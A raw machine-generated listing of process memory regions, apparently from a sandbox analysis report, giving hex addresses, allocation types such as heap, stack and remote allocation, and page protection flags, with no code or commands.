7BD0000
|
trusted library allocation
|
page read and write
|
||
|
2670C000
|
stack
|
page read and write
|
||
|
26E00000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F5610000
|
trusted library allocation
|
page execute and read and write
|
||
|
80096F3000
|
stack
|
page read and write
|
||
|
1B6BFC21000
|
heap
|
page read and write
|
||
|
1CF458A4000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4775F000
|
heap
|
page read and write
|
||
|
3B64EFB000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
273C0000
|
trusted library allocation
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
1CF478BE000
|
heap
|
page read and write
|
||
|
1CF47655000
|
heap
|
page read and write
|
||
|
2762E000
|
stack
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page execute and read and write
|
||
|
796E000
|
stack
|
page read and write
|
||
|
1CF4763A000
|
heap
|
page read and write
|
||
|
1CF47780000
|
heap
|
page read and write
|
||
|
1B6D9D30000
|
heap
|
page read and write
|
||
|
245E9000
|
trusted library allocation
|
page read and write
|
||
|
1CF47666000
|
heap
|
page read and write
|
||
|
8D20000
|
direct allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF476BE000
|
heap
|
page read and write
|
||
|
1CF477D4000
|
heap
|
page read and write
|
||
|
274C0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47816000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4764C000
|
heap
|
page read and write
|
||
|
1CF476DF000
|
heap
|
page read and write
|
||
|
321F000
|
unkown
|
page read and write
|
||
|
1CF45885000
|
heap
|
page read and write
|
||
|
1B6C1530000
|
heap
|
page execute and read and write
|
||
|
1CF47628000
|
heap
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
1CF472D0000
|
heap
|
page read and write
|
||
|
35F0000
|
trusted library allocation
|
page read and write
|
||
|
34BF000
|
stack
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
847000
|
heap
|
page read and write
|
||
|
1B6BFA10000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF457A0000
|
heap
|
page read and write
|
||
|
3590000
|
trusted library section
|
page read and write
|
||
|
1CF47767000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
7D5D000
|
stack
|
page read and write
|
||
|
1CF458B9000
|
heap
|
page read and write
|
||
|
1CF47620000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
7560000
|
direct allocation
|
page read and write
|
||
|
55D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8DF4000
|
heap
|
page read and write
|
||
|
56B2000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9D79000
|
heap
|
page read and write
|
||
|
1B6BFB48000
|
heap
|
page read and write
|
||
|
800A03E000
|
stack
|
page read and write
|
||
|
892F000
|
stack
|
page read and write
|
||
|
5144000
|
remote allocation
|
page execute and read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9B05000
|
heap
|
page read and write
|
||
|
27680000
|
trusted library allocation
|
page read and write
|
||
|
32E2000
|
heap
|
page read and write
|
||
|
1CF4762D000
|
heap
|
page read and write
|
||
|
5B44000
|
remote allocation
|
page execute and read and write
|
||
|
8FD7000
|
heap
|
page read and write
|
||
|
27670000
|
trusted library allocation
|
page read and write
|
||
|
1CF4762D000
|
heap
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47762000
|
heap
|
page read and write
|
||
|
26DB3000
|
trusted library allocation
|
page read and write
|
||
|
1CF47894000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
8C10000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1867000
|
trusted library allocation
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
3B64DFE000
|
stack
|
page read and write
|
||
|
266BD000
|
trusted library allocation
|
page read and write
|
||
|
592B000
|
trusted library allocation
|
page read and write
|
||
|
27670000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFB78000
|
heap
|
page read and write
|
||
|
583C000
|
trusted library allocation
|
page read and write
|
||
|
800A1BB000
|
stack
|
page read and write
|
||
|
59F2000
|
trusted library allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
4EE0000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
74D0000
|
direct allocation
|
page read and write
|
||
|
26850000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
273D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
1CF478BE000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
1CF47731000
|
heap
|
page read and write
|
||
|
597B000
|
trusted library allocation
|
page read and write
|
||
|
7CCF000
|
stack
|
page read and write
|
||
|
1CF458F2000
|
heap
|
page read and write
|
||
|
5267000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
8DCE000
|
heap
|
page read and write
|
||
|
2F9C000
|
stack
|
page read and write
|
||
|
1B6BFB3B000
|
heap
|
page read and write
|
||
|
274AE000
|
stack
|
page read and write
|
||
|
1CF476BD000
|
heap
|
page read and write
|
||
|
7AC0000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4763D000
|
heap
|
page read and write
|
||
|
8D00000
|
direct allocation
|
page read and write
|
||
|
1CF4765A000
|
heap
|
page read and write
|
||
|
1CF4585A000
|
heap
|
page read and write
|
||
|
243E0000
|
heap
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
242C0000
|
heap
|
page read and write
|
||
|
1CF4793C000
|
heap
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
1CF477B4000
|
heap
|
page read and write
|
||
|
1CF45878000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
2698B000
|
heap
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47621000
|
heap
|
page read and write
|
||
|
1CF45867000
|
heap
|
page read and write
|
||
|
26860000
|
heap
|
page read and write
|
||
|
1B6BFB55000
|
heap
|
page read and write
|
||
|
1CF4775D000
|
heap
|
page read and write
|
||
|
543000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF4780D000
|
heap
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4780C000
|
heap
|
page read and write
|
||
|
1B6C2852000
|
trusted library allocation
|
page read and write
|
||
|
266AE000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
5903000
|
trusted library allocation
|
page read and write
|
||
|
800AB8E000
|
stack
|
page read and write
|
||
|
1CF4583E000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47871000
|
heap
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
8840000
|
heap
|
page read and write
|
||
|
1CF458A0000
|
heap
|
page read and write
|
||
|
1CF478BF000
|
heap
|
page read and write
|
||
|
273F0000
|
trusted library allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
24CF0560000
|
heap
|
page read and write
|
||
|
8C5C000
|
heap
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
1CF458F2000
|
heap
|
page read and write
|
||
|
1CF4762F000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
8EEE000
|
stack
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
269FA000
|
heap
|
page read and write
|
||
|
243D0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
direct allocation
|
page read and write
|
||
|
26DEE000
|
trusted library allocation
|
page read and write
|
||
|
1CF458F2000
|
heap
|
page read and write
|
||
|
1CF458E2000
|
heap
|
page read and write
|
||
|
8E57000
|
heap
|
page read and write
|
||
|
1CF477B4000
|
heap
|
page read and write
|
||
|
544000
|
trusted library allocation
|
page read and write
|
||
|
1CF4780F000
|
heap
|
page read and write
|
||
|
1CF4763B000
|
heap
|
page read and write
|
||
|
26DB7000
|
trusted library allocation
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
27630000
|
trusted library allocation
|
page read and write
|
||
|
1CF47640000
|
heap
|
page read and write
|
||
|
1CF478EA000
|
heap
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
1CF477C2000
|
heap
|
page read and write
|
||
|
8860000
|
heap
|
page read and write
|
||
|
1CF476C2000
|
heap
|
page read and write
|
||
|
2431E000
|
stack
|
page read and write
|
||
|
1CF476DF000
|
heap
|
page read and write
|
||
|
89C0000
|
trusted library allocation
|
page read and write
|
||
|
7B7A000
|
heap
|
page read and write
|
||
|
1B6C1490000
|
trusted library allocation
|
page read and write
|
||
|
79AE000
|
stack
|
page read and write
|
||
|
AAF4000
|
direct allocation
|
page execute and read and write
|
||
|
1B6C34FC000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
88ED000
|
stack
|
page read and write
|
||
|
4E2E000
|
stack
|
page read and write
|
||
|
8D50000
|
direct allocation
|
page read and write
|
||
|
1CF47680000
|
heap
|
page read and write
|
||
|
569A000
|
trusted library allocation
|
page read and write
|
||
|
4ECC000
|
stack
|
page read and write
|
||
|
BEF4000
|
direct allocation
|
page execute and read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47850000
|
remote allocation
|
page read and write
|
||
|
274C0000
|
trusted library allocation
|
page read and write
|
||
|
1CF477B0000
|
heap
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
845000
|
heap
|
page read and write
|
||
|
32BC000
|
heap
|
page read and write
|
||
|
1B6C1DEE000
|
trusted library allocation
|
page read and write
|
||
|
7F830000
|
trusted library allocation
|
page execute and read and write
|
||
|
275EE000
|
stack
|
page read and write
|
||
|
1CF45884000
|
heap
|
page read and write
|
||
|
1CF47850000
|
remote allocation
|
page read and write
|
||
|
1B6BFC2C000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
1B6DA040000
|
heap
|
page read and write
|
||
|
26C9E000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
516B000
|
trusted library allocation
|
page read and write
|
||
|
7C40000
|
heap
|
page execute and read and write
|
||
|
8DF6000
|
heap
|
page read and write
|
||
|
1B6D9A90000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
89B0000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF458E2000
|
heap
|
page read and write
|
||
|
3B652FC000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1E52000
|
trusted library allocation
|
page read and write
|
||
|
266C2000
|
trusted library allocation
|
page read and write
|
||
|
1CF47666000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
4FCF000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
24510000
|
remote allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
8837000
|
stack
|
page read and write
|
||
|
1B6C14C0000
|
trusted library allocation
|
page read and write
|
||
|
8C40000
|
trusted library allocation
|
page read and write
|
||
|
7630000
|
heap
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
277EF000
|
stack
|
page read and write
|
||
|
7C8E000
|
stack
|
page read and write
|
||
|
1CF477C2000
|
heap
|
page read and write
|
||
|
1CF4762A000
|
heap
|
page read and write
|
||
|
1CF476DF000
|
heap
|
page read and write
|
||
|
35EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF47680000
|
heap
|
page read and write
|
||
|
24CF0667000
|
heap
|
page read and write
|
||
|
1CF45BA0000
|
heap
|
page read and write
|
||
|
3B64CFF000
|
stack
|
page read and write
|
||
|
24510000
|
remote allocation
|
page read and write
|
||
|
8CD0000
|
direct allocation
|
page read and write
|
||
|
35CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
243B0000
|
direct allocation
|
page read and write
|
||
|
35E0000
|
trusted library allocation
|
page read and write
|
||
|
302C000
|
heap
|
page read and write
|
||
|
2681D000
|
stack
|
page read and write
|
||
|
26696000
|
trusted library allocation
|
page read and write
|
||
|
1CF4793F000
|
heap
|
page read and write
|
||
|
1CF477C2000
|
heap
|
page read and write
|
||
|
1CF47624000
|
heap
|
page read and write
|
||
|
26DF0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47753000
|
heap
|
page read and write
|
||
|
80097BE000
|
stack
|
page read and write
|
||
|
8C60000
|
heap
|
page read and write
|
||
|
5AE1000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1AB2000
|
trusted library allocation
|
page read and write
|
||
|
1CF45800000
|
heap
|
page read and write
|
||
|
5B09000
|
trusted library allocation
|
page read and write
|
||
|
1CF45BA5000
|
heap
|
page read and write
|
||
|
1B6BFAF0000
|
heap
|
page read and write
|
||
|
2D3E000
|
stack
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
3B648F9000
|
stack
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4589E000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
4E78000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4767C000
|
heap
|
page read and write
|
||
|
26A03000
|
heap
|
page read and write
|
||
|
2668E000
|
stack
|
page read and write
|
||
|
4FD0000
|
heap
|
page execute and read and write
|
||
|
1B6D1641000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFB84000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
5B31000
|
trusted library allocation
|
page read and write
|
||
|
1B6D192E000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
7AD9000
|
heap
|
page read and write
|
||
|
B4F4000
|
direct allocation
|
page execute and read and write
|
||
|
1CF4776E000
|
heap
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
331F000
|
stack
|
page read and write
|
||
|
266A2000
|
trusted library allocation
|
page read and write
|
||
|
24571000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
58B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B6D9DC5000
|
heap
|
page read and write
|
||
|
245AF000
|
trusted library allocation
|
page read and write
|
||
|
800A13F000
|
stack
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
1CF458F2000
|
heap
|
page read and write
|
||
|
8930000
|
heap
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
26E00000
|
trusted library allocation
|
page read and write
|
||
|
1CF4793A000
|
heap
|
page read and write
|
||
|
1CF4762E000
|
heap
|
page read and write
|
||
|
242AF000
|
stack
|
page read and write
|
||
|
26DAD000
|
trusted library allocation
|
page read and write
|
||
|
1CF477CD000
|
heap
|
page read and write
|
||
|
8C96000
|
heap
|
page read and write
|
||
|
26840000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFC60000
|
heap
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
8D78000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
direct allocation
|
page read and write
|
||
|
1B6C1E27000
|
trusted library allocation
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
8009A7E000
|
stack
|
page read and write
|
||
|
3B64AFE000
|
stack
|
page read and write
|
||
|
79D1000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
800AC8D000
|
stack
|
page read and write
|
||
|
1CF477AF000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
1CF47624000
|
heap
|
page read and write
|
||
|
1CF458A0000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
26C5E000
|
stack
|
page read and write
|
||
|
1B6D9647000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4790F000
|
heap
|
page read and write
|
||
|
275AE000
|
stack
|
page read and write
|
||
|
8EAE000
|
stack
|
page read and write
|
||
|
89D0000
|
trusted library allocation
|
page read and write
|
||
|
1CF477EF000
|
heap
|
page read and write
|
||
|
353F000
|
stack
|
page read and write
|
||
|
588C000
|
trusted library allocation
|
page read and write
|
||
|
800AD0A000
|
stack
|
page read and write
|
||
|
7F9B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
274B7000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
26750000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47795000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47731000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
6F44000
|
remote allocation
|
page execute and read and write
|
||
|
1B6C1E15000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9C20000
|
heap
|
page execute and read and write
|
||
|
1CF47AC0000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
550000
|
trusted library allocation
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
1B6BFC85000
|
heap
|
page read and write
|
||
|
577000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF4764B000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47623000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
530000
|
trusted library allocation
|
page read and write
|
||
|
1CF4762F000
|
heap
|
page read and write
|
||
|
8E2D000
|
heap
|
page read and write
|
||
|
1CF458EC000
|
heap
|
page read and write
|
||
|
1CF4777B000
|
heap
|
page read and write
|
||
|
7D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF4765D000
|
heap
|
page read and write
|
||
|
54D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF458C9000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
direct allocation
|
page read and write
|
||
|
1B6BFB10000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
273E0000
|
trusted library allocation
|
page read and write
|
||
|
1CF45887000
|
heap
|
page read and write
|
||
|
8CA0000
|
direct allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
1CF458ED000
|
heap
|
page read and write
|
||
|
1CF458B9000
|
heap
|
page read and write
|
||
|
8DB2000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9A93000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
35B0000
|
trusted library allocation
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
5100000
|
heap
|
page read and write
|
||
|
1CF47795000
|
heap
|
page read and write
|
||
|
1B6C1C74000
|
trusted library allocation
|
page read and write
|
||
|
1CF47624000
|
heap
|
page read and write
|
||
|
3640000
|
heap
|
page read and write
|
||
|
74B0000
|
direct allocation
|
page read and write
|
||
|
26DE0000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9C30000
|
heap
|
page read and write
|
||
|
1CF4774D000
|
heap
|
page read and write
|
||
|
1CF4585A000
|
heap
|
page read and write
|
||
|
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
26E00000
|
trusted library allocation
|
page read and write
|
||
|
8B8B000
|
stack
|
page read and write
|
||
|
35C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
|
D2F4000
|
direct allocation
|
page execute and read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9C50000
|
heap
|
page read and write
|
||
|
2435E000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4780F000
|
heap
|
page read and write
|
||
|
1B6D9B2E000
|
heap
|
page read and write
|
||
|
580000
|
trusted library allocation
|
page execute and read and write
|
||
|
266B6000
|
trusted library allocation
|
page read and write
|
||
|
3610000
|
trusted library allocation
|
page read and write
|
||
|
26861000
|
heap
|
page read and write
|
||
|
4F08000
|
heap
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
4F8E000
|
stack
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
26DFD000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D40000
|
direct allocation
|
page read and write
|
||
|
1CF47630000
|
heap
|
page read and write
|
||
|
1CF47621000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
8C30000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1630000
|
heap
|
page read and write
|
||
|
24CF066D000
|
heap
|
page read and write
|
||
|
273C0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1450000
|
trusted library allocation
|
page read and write
|
||
|
8FD0000
|
heap
|
page read and write
|
||
|
3B651FE000
|
stack
|
page read and write
|
||
|
24CF07C0000
|
heap
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
273D0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47645000
|
heap
|
page read and write
|
||
|
7D98000
|
trusted library allocation
|
page read and write
|
||
|
1CF47818000
|
heap
|
page read and write
|
||
|
4744000
|
remote allocation
|
page execute and read and write
|
||
|
8009B7C000
|
stack
|
page read and write
|
||
|
1CF47795000
|
heap
|
page read and write
|
||
|
26DF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
245BD000
|
trusted library allocation
|
page read and write
|
||
|
1CF457C0000
|
heap
|
page read and write
|
||
|
572000
|
trusted library allocation
|
page read and write
|
||
|
7944000
|
remote allocation
|
page execute and read and write
|
||
|
1CF47730000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
8C6C000
|
heap
|
page read and write
|
||
|
7AC9000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1CF477AF000
|
heap
|
page read and write
|
||
|
9630000
|
direct allocation
|
page execute and read and write
|
||
|
1B6D9B54000
|
heap
|
page read and write
|
||
|
1B6C35DA000
|
trusted library allocation
|
page read and write
|
||
|
7590000
|
direct allocation
|
page read and write
|
||
|
560000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
32AD000
|
stack
|
page read and write
|
||
|
3347000
|
heap
|
page read and write
|
||
|
2456E000
|
stack
|
page read and write
|
||
|
8344000
|
remote allocation
|
page execute and read and write
|
||
|
274C0000
|
trusted library allocation
|
page read and write
|
||
|
244B0000
|
trusted library allocation
|
page read and write
|
||
|
8E5E000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF476DF000
|
heap
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
980000
|
heap
|
page readonly
|
||
|
2FD9000
|
stack
|
page read and write
|
||
|
74E0000
|
direct allocation
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
26961000
|
heap
|
page read and write
|
||
|
3630000
|
trusted library allocation
|
page execute and read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1E3D000
|
trusted library allocation
|
page read and write
|
||
|
1CF4780C000
|
heap
|
page read and write
|
||
|
277AE000
|
stack
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF45809000
|
heap
|
page read and write
|
||
|
1B6C16C4000
|
trusted library allocation
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
26DB1000
|
trusted library allocation
|
page read and write
|
||
|
1CF458AA000
|
heap
|
page read and write
|
||
|
1CF45790000
|
heap
|
page read and write
|
||
|
1CF47639000
|
heap
|
page read and write
|
||
|
26DC2000
|
trusted library allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
26C1E000
|
stack
|
page read and write
|
||
|
245E7000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFB75000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47676000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
27630000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFB7A000
|
heap
|
page read and write
|
||
|
8CE0000
|
direct allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B6C2EFF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
34FE000
|
stack
|
page read and write
|
||
|
4ED0000
|
heap
|
page execute and read and write
|
||
|
1B6C2EFC000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFB30000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
27660000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9B68000
|
heap
|
page read and write
|
||
|
1CF477DE000
|
heap
|
page read and write
|
||
|
4F4E000
|
stack
|
page read and write
|
||
|
1B6BFC50000
|
heap
|
page read and write
|
||
|
1CF4582C000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1641000
|
trusted library allocation
|
page read and write
|
||
|
5A6A000
|
trusted library allocation
|
page read and write
|
||
|
89A0000
|
trusted library allocation
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
274C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
8DE9000
|
heap
|
page read and write
|
||
|
8D70000
|
heap
|
page read and write
|
||
|
1B6D9BB0000
|
heap
|
page execute and read and write
|
||
|
24469000
|
stack
|
page read and write
|
||
|
1B6D1661000
|
trusted library allocation
|
page read and write
|
||
|
1CF477CF000
|
heap
|
page read and write
|
||
|
274C0000
|
trusted library allocation
|
page read and write
|
||
|
8009CFE000
|
stack
|
page read and write
|
||
|
26DB1000
|
trusted library allocation
|
